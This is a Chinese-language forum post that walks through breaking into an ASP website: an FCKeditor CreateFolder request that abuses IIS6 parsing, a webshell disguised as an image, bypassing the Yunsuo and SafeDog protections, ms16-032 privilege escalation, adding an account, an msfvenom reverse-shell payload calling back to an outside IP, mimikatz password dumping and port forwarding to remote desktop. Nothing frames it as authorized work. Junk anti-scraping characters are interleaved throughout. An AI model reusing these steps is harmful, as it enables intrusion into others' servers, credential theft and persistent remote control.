|
5 ?0 ~2 [: o2 K9 T9 h* G
+ o' }2 {. J8 q
6 H/ R2 S7 s% j1 g6 [ v7 G7 ~
t' p5 _4 k0 U' h9 F" R |
4 }4 L) |# m& s0 E: {, n" L9 c 8 l0 y @* N3 n \3 r
* N7 n5 h& \7 M' w& Y7 l一、 利用getwebshell篇
8 g' r( O, S- D" J! S' c0 R, L
3 A X) ^; d9 M2 K4 K6 s3 L5 d, I
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
9 R3 m* O" ?, y; d% P' v
" m- R$ k* b8 z3 E @0 y
9 g1 S5 K7 X- m* i/ `9 T( m下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
: v/ n) B' S4 Z( }" t5 g
2 O$ v! N4 M" ]1 w; g
下面我们构造一个asp目录,如:
: X' D) P& d! R( O% U c
$ E1 M7 k7 v; u" g! k2 g8 _ g8 Z: D K$ ^! _5 {
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
0 M% p( F: n9 q( @ 1 S9 W6 R: k$ N6 q! h
$ c1 B- F' t* ^2 n. b 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 | L- h+ h7 T4 B0 b
) Y) s. f9 @# L2 Y1 _9 V" G
一、 绕过安全狗云锁提权并且加账号
2 o' {8 @% R# O
& [* Z$ d1 c" I+ d6 `没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
0 F. a& `6 T! N2 Z1 Z T
+ _4 ?0 I3 X3 }0 t; \& u5 K如图:
! _/ ?$ z6 r: k$ h, \) i
) U9 I3 g( T5 Y4 Y( ~% z3 c o9 ]
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
6 Z) ~0 H- G: B! J2 K
( K# K; _- \3 q
一、 利用metasploit
( O) z1 |0 T$ B% T% Y/ J: w
1 v2 | k y7 G4 ?. W0 U首先用pentestbox生成一个64位的payload如下命令
* Q6 [# {& Q% D. U# Q4 x8 t4 @! u
5 x* q" u( O9 w; S4 z" F- h( ZmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
9 k2 `6 h7 A6 a' O, N$ p
) i& A5 G; d1 y+ y& R8 f% S2 Q
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
( y; r$ B+ c/ G0 p
1 V. A5 n) j2 z7 F2 n下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
" M' F% {6 Y X& K' L/ F
& _% {- L2 V% _; O. r下面我们来做一个监听如下命令:
6 Y8 ?" A# g( P: ]# T
2 P2 Q0 J5 }9 F3 v7 a
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
! u8 l& t6 h+ O) a4 P( _ 9 G$ G; s6 R! c2 Q5 \- z) ]
' U# U! i- l% V E | ' h2 Y: j& N4 M( F0 ~) p, X
$ X" p0 |5 l- p- f, E
. F# e: m8 b* I3 A7 R7 \
& h# m# R- l; I6 [. ?% H# F- o8 _1 ]+ \; Z- d4 V
P2 b, ]" Y7 s' C! E2 x
' W3 J+ K6 A$ n% H( W, {4 ~
. S' u+ R3 H5 L) ?# R8 c
8 v' {) ]" O, r k& | * H4 m4 |9 I _. V( U" [
) Y: y. w- T# m Q6 h; D 5 Q. c P6 F+ Z+ O M- c3 h2 X
& _5 t2 H' Y: k( I, B, ~ X
% f# Y9 Y t, l+ X/ t, o
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06